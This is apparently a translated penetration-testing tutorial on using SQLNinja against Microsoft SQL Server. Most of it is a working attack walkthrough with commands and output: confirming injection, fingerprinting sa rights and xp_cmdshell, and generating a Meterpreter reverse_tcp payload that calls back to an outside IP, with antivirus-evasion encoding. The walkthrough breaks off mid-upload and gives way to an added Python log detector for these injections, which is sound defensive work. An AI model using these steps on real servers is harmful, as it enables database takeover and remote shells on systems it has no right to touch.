Learning BackTrack 5: SQLNinja

I have recently been learning penetration testing under BackTrack 5 and happen to be studying SQLMap and SQLNinja at the same time. Below is how SQLNinja is used; for SQLMap, see my earlier post.

    root@perl-exploits:/pentest/database/sqlninja-0.2.3# ./sqlninja -m
    Usage: ./sqlninja
      -m <mode> : Required. Available modes are:
        t/test - test whether the injection is working
        f/fingerprint - fingerprint user, xp_cmdshell and more
        b/bruteforce - bruteforce sa account
        e/escalation - add user to sysadmin server role
        x/resurrectxp - try to recreate xp_cmdshell
        u/upload - upload a .scr file
        s/dirshell - start a direct shell
        k/backscan - look for an open outbound port
        r/revshell - start a reverse shell
        d/dnstunnel - attempt a dns tunneled shell
        c/sqlcmd - issue a 'blind' OS command
        m/metasploit - wrapper to Metasploit stagers
      -f <file> : configuration file (default: sqlninja.conf)
      -p <password> : sa password
      -w <wordlist> : wordlist to use in bruteforce mode (dictionary method only)
      -v : verbose output
      -d <mode> : activate debug
        1 - print each injected command
        2 - print each raw HTTP request
        3 - print each raw HTTP response
        all - all of the above
      ...see sqlninja-howto.html for details

That is a lot of options, so let's go through them one by one. `./sqlninja -m` loads a mode; the modes listed under it are described below.

t/test checks whether the current mode and the configuration file are working properly:

    root@perl-exploits:/pentest/database/sqlninja-0.2.3# ./sqlninja -m test
    Sqlninja rel. 0.2.3
    Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>
    [+] Parsing configuration file...............
    [+] Evasion technique(s):
    - query hex-encoding
    - comments as separator
    - random URI encoding
    [+] Checking whether the remote server uses SSL
    [+] The remote server does not talk SSL
    [+] Target is:
    [+] Trying to inject a 'waitfor delay'....
    [+] Injection was successful! Let's rock !!

OK, the test succeeded: the current injection point is recognised, and an injection vulnerability exists.

f/fingerprint (fingerprint user, xp_cmdshell and more) determines the database version, the current user, and whether xp_cmdshell exists and can be used:

    root@perl-exploits:/pentest/database/sqlninja-0.2.3# ./sqlninja -m fingerprint
    Sqlninja rel. 0.2.3
    Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>
    [+] Parsing configuration file...............
    [+] Evasion technique(s):
    - query hex-encoding
    - comments as separator
    - random URI encoding
    [+] Checking whether the remote server uses SSL
    [+] The remote server does not talk SSL
    [+] Target is:
    What do you want to discover ?
      0 - Database version (2000/2005)
      1 - Database user
      2 - Database user rights
      3 - Whether xp_cmdshell is working
      4 - Whether mixed or Windows-only authentication is used
      a - All of the above
      h - Print this menu
      q - exit
    >

The menu items: 0 checks the database version, 1 the current database user, 2 the current user's privileges, 3 whether xp_cmdshell is usable, 4 whether Windows-only authentication is in use; a runs all of the checks above, h prints this help menu and q quits.

    > a
    [+] Checking SQL Server version...
      Target: Microsoft SQL Server 2000
    [+] Checking whether we are sysadmin...
      We seem to be 'sa'
    [+] Checking whether xp_cmdshell is available
      xp_cmdshell seems to be available
      Mixed authentication seems to be used
    >

m/metasploit uses shellcode from Metasploit. It is not enabled by default; you have to edit the Metasploit path in sqlninja.conf:

    # Path to metasploit executable. Only needed if msfpayload and
    # msfcli are not already in the path
    msfpath = /pentest/exploits/framework3/

Remove the leading comment sign and change the path to wherever your framework3 is installed.

    root@perl-exploits:/pentest/database/sqlninja-0.2.3# ./sqlninja -m metasploit
    Sqlninja rel. 0.2.3
    Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>
    [+] Parsing configuration file...............
    [+] Evasion technique(s):
    - query hex-encoding
    - comments as separator
    - random URI encoding
    [+] Checking whether the remote server uses SSL
    [+] The remote server does not talk SSL
    [+] Target is:
    [+] Entering Metasploit module.
    In order to use this module you need to
    have found an available TCP port, either inbound or outbound
    [+] Checking Metasploit3 availability....
    [+] Which payload you want to use?
    1: Meterpreter
    2: VNC
    >

Metasploit is invoked here because its payloads are used. There are two choices: Meterpreter, or a reverse VNC connection. From a console I recommend Meterpreter; under GNOME or another windowing environment, VNC. (Note that vncserver must be installed on your own machine: in my testing, the vncserver bundled with Metasploit could not be invoked correctly.) OK, let's try both methods. First, Meterpreter:

    > 1
    [+] Which type of connection you want to use?
    1: bind_tcp
    2: reverse_tcp
    >

Here we choose the connection type. 1 is bind_tcp, which binds a port on the server; 2 is reverse_tcp, which connects back to our machine. Given that the server probably sits behind a firewall, 2 is generally recommended, but if you have no public IP address or VPN with a public address, use bind_tcp. We choose 2.

    > 2
    [+] Enter local port number
    > 443

We are asked for a local port; use one that is not already in use. Here I enter 443.

    [+] Choose a payload encoding method
    0 - none
    1 - Alpha2 Alphanumeric Mixedcase
    2 - Alpha2 Alphanumeric Uppercase
    3 - Avoid UTF8/tolower
    4 - Call+4 Dword XOR
    5 - Single-byte XOR Countdown
    6 - Variable-length Fnstenv/mov Dword XOR
    7 - Polymorphic Jump/Call XOR Additive Feedback
    8 - Non-Alpha
    9 - Non-Upper
    10 - Polymorphic XOR Additive Feedback
    11 - Alpha2 Alphanumeric Unicode Mixedcase
    12 - Alpha2 Alphanumeric Unicode Uppercase
    >

This asks for the shellcode encoding method, which exists mainly to avoid detection by antivirus software on the server. Pick whatever suits the situation; I chose 0.

    [+] Calling msfpayload3 to create the payload...
    Created by msfpayload ().
    Payload: windows/meterpreter/reverse_tcp
    Length: 278
    Options: exitfunc=process,lport=443,lhost=211.45.123.200
    [+] Payload (met50838.exe) created. Now converting it to debug script
    [+] Uploading /tmp/met50838.scr debug script............
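From the defender's side, the test and fingerprint runs above tell you exactly what to look for in web-server logs: a 'waitfor delay' probe and xp_cmdshell calls, hidden behind the three evasions sqlninja reports (query hex-encoding, comments as separator, random URI encoding). The following Python is an added example, not code from the original post or from sqlninja; it normalizes query strings against those evasions and flags the keywords. The sample queries are constructed fixtures, and embedding the hex literal in exec() is an assumption about how such a query could show up in a log.

```python
import re
from urllib.parse import unquote

# Constructed query strings standing in for web-server access-log entries
# (test fixtures written for this example, not taken from the original post).
SAMPLE_QUERIES = [
    "id=1",                                                 # benign
    "q=waitforbid",                                         # benign, keyword inside a word
    "id=1;waitfor%2520delay%2520'0:0:5'--",                 # double URI-encoded
    "id=1;%77%61%69tfor%20delay%20'0:0:5'--",               # partially (random) URI-encoded
    "id=1;waitfor/**/delay/**/'0:0:5'--",                   # comments instead of spaces
    "id=1;exec(0x77616974666f722064656c61792027303a303a3527)--",  # hex-encoded query (assumed form)
    "id=1;exec%20master..xp_cmdshell%20'whoami'--",         # xp_cmdshell call
]

SUSPICIOUS = re.compile(r"\bwaitfor\s+delay\b|\bxp_cmdshell\b", re.IGNORECASE)
HEX_LITERAL = re.compile(r"0x(?:[0-9a-fA-F]{2}){4,}")     # 0x followed by >= 4 bytes


def normalize(query: str, max_rounds: int = 3) -> str:
    """Undo the three evasions listed by sqlninja before matching keywords."""
    text = query
    for _ in range(max_rounds):                 # repeated / partial URI encoding
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text)      # /**/ used in place of whitespace
    # 0x... literals: decode them to text so hex-encoded SQL becomes visible
    text = HEX_LITERAL.sub(
        lambda m: " " + bytes.fromhex(m.group(0)[2:]).decode("latin-1") + " ", text)
    return re.sub(r"\s+", " ", text).strip()


def classify(query: str) -> list:
    """Return the sorted set of suspicious tokens found after normalization."""
    hits = {m.group(0).lower() for m in SUSPICIOUS.finditer(normalize(query))}
    return sorted(hits)


def scan(queries) -> list:
    """Return (query, findings) pairs for every entry that trips the detector."""
    return [(q, classify(q)) for q in queries if classify(q)]


if __name__ == "__main__":
    for query, findings in scan(SAMPLE_QUERIES):
        print(f"{findings}  <-  {query}")
```

The same normalization step is what a WAF or log-review job needs before keyword matching; without it, the hex-encoded and double-encoded variants slip past a naive grep for "waitfor delay".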
